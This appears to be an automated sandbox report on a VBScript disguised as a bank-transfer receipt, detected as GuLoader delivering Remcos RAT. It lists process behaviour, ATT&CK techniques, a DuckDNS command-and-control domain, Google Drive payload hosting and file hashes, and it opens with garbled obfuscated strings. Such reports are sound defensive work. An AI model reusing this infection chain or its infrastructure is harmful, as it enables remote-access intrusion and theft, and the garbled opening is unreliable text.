lmu.tavlesfrie.psuperl traficomedtpenda( oris$ flugs je ne physmfis eii,termbeci askrifn worsablo.mgfornyeintr.ridrtsi ma,ta ansal svbc) filn ');revanchistens (balladised 'forgj[tandsnunc ie sangt p am.journsb rtkescriprbagsivu.ducibrle.cban eesikrepcardooov,rmi tilbnudad tbarrimvaernapsychn.eminaprimpggenneeskib,rlep o]forre:dever:deodos semeeflaggcorganusmkfyr cuttisevertakvarycrucipstandrmonk,ot utot .nfeosofa,c sammo antil flir gimme= udva mejed[ domin udplestudct eph . plansqerumepilotcfordrusek.dr thebi knartindusyextrapgif wrdeadbodecomterminovsentc flerojakoblmoti,t repoy cinepafslueusort]bever: und :pseudtdragsllikrss.assa1rigou2suJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7272, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 7272, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information221
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		1
              Windows Service              		1
              Windows Service              		1
              Masquerading              		OS Credential Dumping1
              Security Software Discovery              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		221
              Scripting              		111
              Process Injection              		21
              Virtualization/Sandbox Evasion              		LSASS Memory1
              Process Discovery              		Remote Desktop ProtocolData from Removable Media1
              Remote Access Software              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		111
              Process Injection              		Security Account Manager21
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook2
              Obfuscated Files or Information              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing              		LSA Secrets1
              File and Directory Discovery              		SSHKeylogging113
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523154 Sample: Recibo de transferencia#U00... Startdate: 01/10/2024 Architecture: WINDOWS Score: 100 28 drive.usercontent.google.com 2->28 30 drive.google.com 2->30 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Yara detected GuLoader 2->46 48 6 other signatures 2->48 8 wscript.exe 1 2->8         started        11 powershell.exe 18 2->11         started        13 msiexec.exe 2->13         started        signatures3 process4 signatures5 50 VBScript performs obfuscated calls to suspicious functions 8->50 52 Suspicious powershell command line found 8->52 54 Wscript starts Powershell (via cmd or directly) 8->54 60 2 other signatures 8->60 15 powershell.exe 14 18 8->15         started        56 Writes to foreign memory regions 11->56 58 Found suspicious powershell code related to unpacking or dynamic code loading 11->58 20 msiexec.exe 6 11->20         started        22 conhost.exe 11->22         started        process6 dnsIp7 32 drive.google.com 142.250.184.206, 443, 49730, 49738 GOOGLEUS United States 15->32 34 drive.usercontent.google.com 142.250.185.97, 443, 49731, 49739 GOOGLEUS United States 15->34 26 C:\Users\user\...\Margenindstilling.Sys, ASCII 15->26 dropped 36 Sample is not signed and drops a device driver 15->36 38 Found suspicious powershell code related to unpacking or dynamic code loading 15->38 24 conhost.exe 15->24         started        40 Detected Remcos RAT 20->40 file8 signatures9 process10

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Recibo de transferencia#U00b7pdf.vbs8%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              drive.google.com
              		142.250.184.206
              		truefalse
                		unknown
                drive.usercontent.google.com
                		142.250.185.97
                		truefalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  a458386d9.duckdns.orgtrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://drive.usercontent.google.com/jmsiexec.exe, 00000008.00000003.2252216102.0000000006659000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1849772141.000001F89A94D000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2322880413.0000000007B59000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2322880413.0000000007B59000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://go.micropowershell.exe, 00000001.00000002.1849772141.000001F899776000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.microsoft.copowershell.exe, 00000003.00000002.2322880413.0000000007BFD000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://contoso.com/Licensepowershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://drive.googPpowershell.exe, 00000001.00000002.1849772141.000001F89A176000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://drive.usercontent.google.com/msiexec.exe, 00000008.00000003.2252216102.0000000006659000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://drive.google.compowershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.gomsiexec.exe, 00000008.00000003.2252216102.0000000006666000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2293008965.0000000005148000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2322880413.0000000007B59000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://www.google.compowershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://crl.mpowershell.exe, 00000001.00000002.1886122116.000001F8B0F27000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://drive.usercontent.google.com/fkmsiexec.exe, 00000008.00000003.2252216102.0000000006659000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2294071887.0000000006660000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://drive.google.com/msiexec.exe, 00000008.00000002.2294071887.00000000065EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://aka.ms/pscore6lBfqpowershell.exe, 00000003.00000002.2293008965.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contoso.com/powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1880233584.000001F8A8C05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2314752191.000000000605D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://drive.google.compowershell.exe, 00000001.00000002.1849772141.000001F898DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A176000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899026000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1849772141.000001F898B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://apis.google.compowershell.exe, 00000001.00000002.1849772141.000001F89A93A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F89A936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1849772141.000001F899022000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212817161.0000000006666000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2212886408.0000000006666000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1849772141.000001F898B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2293008965.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      142.250.184.206
                                                      		drive.google.comUnited States
                                                      		15169GOOGLEUSfalse
                                                      142.250.185.97
                                                      		drive.usercontent.google.comUnited States
                                                      		15169GOOGLEUSfalse

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1523154
                                                      Start date and time:2024-10-01 07:41:17 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 6m 32s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:13
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:Recibo de transferencia#U00b7pdf.vbs
                                                      renamed because original name is a hash value
                                                      Original Sample Name:Recibo de transferenciapdf.vbs
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winVBS@9/7@2/2
                                                      EGA Information:Failed
                                                      HCA Information:
                                                      • Successful, ratio: 79%
                                                      • Number of executed functions: 56
                                                      • Number of non-executed functions: 21
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .vbs

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target msiexec.exe, PID 7272 because there are no executed function
                                                      • Execution Graph export aborted for target powershell.exe, PID 7592 because it is empty
                                                      • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: Recibo de transferencia#U00b7pdf.vbs

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      01:42:12API Interceptor86x Sleep call for process: powershell.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0emtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      Purchase Order 007823-PO# 005307.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      invoice.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      37f463bf4616ecd445d4a1937da06e196JA2YPtbeB.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      hTR7xY0d0V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      N83LFtMTUS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      Awb_Shipping_Invoice_docs_001700720242247820020031808174CN18003170072024.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousLodaRATBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousXWorm, XmrigBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      Payment Advice Note_Pdf.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206
                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                      • 142.250.185.97
                                                      • 142.250.184.206

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):8003
                                                      Entropy (8bit):4.840877972214509
                                                      Encrypted:false
                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                      MD5:106D01F562D751E62B702803895E93E0
                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1940658735648508
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:@...e.................................X..............@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmaknurk.bre.ps1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2mcr4sj.3wo.psm1

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
